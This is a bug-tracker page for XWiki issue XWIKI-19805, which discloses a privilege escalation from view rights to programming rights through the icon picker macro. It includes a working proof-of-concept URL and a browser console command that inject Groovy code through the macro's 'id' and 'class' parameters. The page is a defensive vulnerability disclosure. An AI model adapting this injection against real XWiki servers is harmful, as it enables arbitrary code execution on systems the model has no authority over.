Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-19805

Privilege escalation (PR) from view rights through the icon picker macro

    XMLWordPrintable

Details

    • Unknown
    • N/A
    • N/A

    Description

      Steps to reproduce

      Go to the URL

      <server>/xwiki/bin/view/Main?sheet=CKEditor.HTMLConverter&language=en&sourceSyntax=xwiki%252F2.1&stripHTMLEnvelope=true&fromHTML=false&toHTML=true&text=%7B%7BiconPicker%20id%3D%22'%3C%2Fscript%3E%7B%7B%2Fhtml%7D%7D%7B%7Bcache%7D%7D%7B%7Bgroovy%7D%7Dprintln(%2FHellofromIconPickerId%2F)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fcache%7D%7D%22%20class%3D%22'%3C%2Fscript%3E%7B%7B%2Fhtml%7D%7D%7B%7Bcache%7D%7D%7B%7Bgroovy%7D%7Dprintln(%2FHellofromIconPickerClass%2F)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fcache%7D%7D%22%2F%7D%7D

      where <server> is your XWiki installation URL.

      Expected result

      Nothing is visible as everything is hidden in a <script>-tag.

      Actual result

      HellofromIconPickerId').xwikiIconPicker(options);
$('.'</script>{{/html}}HellofromIconPickerClass').xwikiIconPicker(options);
});
</script>
{{/html}}

      This demonstrates a privilege escalation from view rights on the icon picker macro, CKEditor and the Main page to programming rights through the "id" and "class"-parameters.

      As the code that prints the parameter has been unchanged since the introduction as part of XWIKI-11388 this is exploitable since XWiki 6.4-milestone-2.

      Reproduction steps on XWiki 6.4-milestone-2:

      Run

      jQuery.post('http://localhost:8080/xwiki/bin/view/Main/?xpage=wysiwyginput', {source: '{{iconPicker id="\\\'</script>{{/html}}{{cache}}{{groovy}}println(/HellofromIconPickerId/){{/groovy}}{{/cache}}" class="\\\'</script>{{/html}}{{cache}}{{groovy}}println(/HellofromIconPickerClass/){{/groovy}}{{/cache}}"/}}', token: document.documentElement.dataset.xwikiFormToken}, console.log)

      in the console of the browser's developer tools (replace localhost:8080 by the server's URL).

      Check for the output

      $('#\'</script><p>HellofromIconPickerId</p>').xwikiIconPicker(options);<br/>$('.\'&lt;/script&gt;&#123;&#123;/html}}<p>HellofromIconPickerClass</p>').xwikiIconPicker(options);<br/>});<br/>&lt;/script&gt;<br/>&#123;&#123;/html}}</p>

      Attachments

        Issue Links

          causes

          Bug - A problem which impairs or prevents the functions of the product. XWIKI-20033 AppWithinMinutes application entry icon picker is not displayed anymore

          • Blocker - Blocks development and/or testing work, production could not run.
          • Closed

          Bug - A problem which impairs or prevents the functions of the product. XWIKI-20049 The icon picker doesn't work when creating or editing a template provider

          • Blocker - Blocks development and/or testing work, production could not run.
          • Closed
          is caused by

          Improvement - An improvement or enhancement to an existing feature or task. XWIKI-11388 Create an icon picker that lists all available icons

          • Major - Major loss of function.
          • Closed
          links to

          Web Link GitHub Security advisory

          Activity

            People

              MichaelHamann Michael Hamann
              MichaelHamann Michael Hamann
              Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: